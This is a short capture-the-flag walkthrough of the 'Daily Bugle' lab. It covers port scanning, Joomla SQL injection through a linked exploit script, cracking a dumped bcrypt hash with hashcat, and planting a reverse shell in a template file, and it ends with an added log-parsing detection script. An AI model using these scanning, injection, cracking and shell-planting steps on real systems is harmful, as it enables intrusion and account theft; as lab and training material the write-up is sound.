CTF Daily Bugle

  1. rustscan
  2. robots.txt
  3. Joomla
  4. sqli
  5. Crack the hash
  6. reverse shell
  7. lse
  8. polkit

rustscan

rustscan -a 10.10.56.151 --ulimit 5000

robots.txt

http://10.10.56.151/robots.txt

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Joomla

http://10.10.56.151//htaccess.txt

We are in 2023; there are a few CVEs here.

https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html

http://10.10.56.151/index.php?option=com_fields&view=fields&layout=modal
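Defender's view of the URL above, as an added example (not part of the original writeup): a log check that flags front-end requests to the com_fields modal view and lists any extra parameter names sent with them. The log lines, IP addresses and the `extra_param` key are constructed; treating every front-end hit as worth review is an assumption of this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2023:10:00:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2023:10:00:05 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal HTTP/1.1" 200 2048 "-" "python-requests/2.28"
198.51.100.7 - - [01/Jan/2023:10:00:06 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&extra_param=PLACEHOLDER HTTP/1.1" 500 310 "-" "python-requests/2.28"
192.0.2.10 - - [01/Jan/2023:10:01:00 +0000] "GET /administrator/index.php?option=com_fields&view=fields&layout=modal HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# The three query parameters from the URL in the writeup.
WATCHED = {"option": "com_fields", "view": "fields", "layout": "modal"}


def find_com_fields_hits(log_text):
    """Return {ip: [hit, ...]} for front-end requests to the com_fields modal view."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        # Assumption: /administrator/ traffic is authenticated back-end use and out of scope.
        if url.path.lower().startswith("/administrator/"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if all(WATCHED[k] in [v.lower() for v in params.get(k, [])] for k in WATCHED):
            hits[m["ip"]].append({
                "status": int(m["status"]),
                # Names only: extra keys on this view are the first thing to triage.
                "extra_params": sorted(set(params) - set(WATCHED)),
            })
    return dict(hits)


if __name__ == "__main__":
    for ip, found in find_com_fields_hits(SAMPLE_LOG).items():
        print(ip, found)
```
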

sqli

https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py

Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']

Crack the hash

hashcat -m 3200 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

Output:

$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm:spiderman123

jonah:spiderman123

reverse shell

https://www.hackingarticles.in/joomla-reverse-shell/
Place the reverse shell in error.php, then request:
10.10.56.151/index.php/zefzef

lse

polkit